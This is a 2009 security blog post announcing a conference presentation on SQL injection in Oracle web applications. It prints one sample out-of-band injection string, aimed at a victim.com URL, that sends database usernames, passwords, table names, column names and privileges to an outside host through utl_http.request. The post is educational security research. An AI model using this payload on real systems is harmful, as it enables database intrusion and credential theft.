Presentation from Confidence 2009 available

16 Mai 2009 von Alexander Kornbrust.

I just uploaded the presentation “SQL Injection in Oracle Webapps” to our website. This presentation describes the basics of SQL, different exploitation techniques (inband, out-of-band, blind), how to search creditcard numbers in the database (using dbms_xmlgen), …Here is one of the sample SQL Injection strings from the presentation. With this  SQL Injection string we are getting all username/passwords, all table names, all column names and all privileges in one step. The trick is to use sum(length(utl_http())) in the SELECT clause.

http://victim.com/order.jsp?id=17‘ or 1=((select

sum(length(utl_http.request(’http://www.orasploit.com/’||

username||’='||password) from dba_users)))+((select

sum(utl_http.request(’http://www. orasploit.com/’||

owner||’='||table_name) from dba_tables))+((select

sum(length(utl_http.request(’http://www.orasploit.com/’||

owner||’='||table_name||’='||column_name)) from dba_users))

+((select sum(length(utl_http.request(’http://

www.orasploit.com/’||grantee||’='||granted_role) from

dba_role_privs)))+((select

sum(length(utl_http.request(’http://www.orasploit.com/’||

grantee||’='||owner||’='||table_name||’='||privilege||’='||

grantable) from dba_tab_privs)))–

Geschrieben in SQL Injection, Security, Allgemein | Drucken | 1 Kommentar »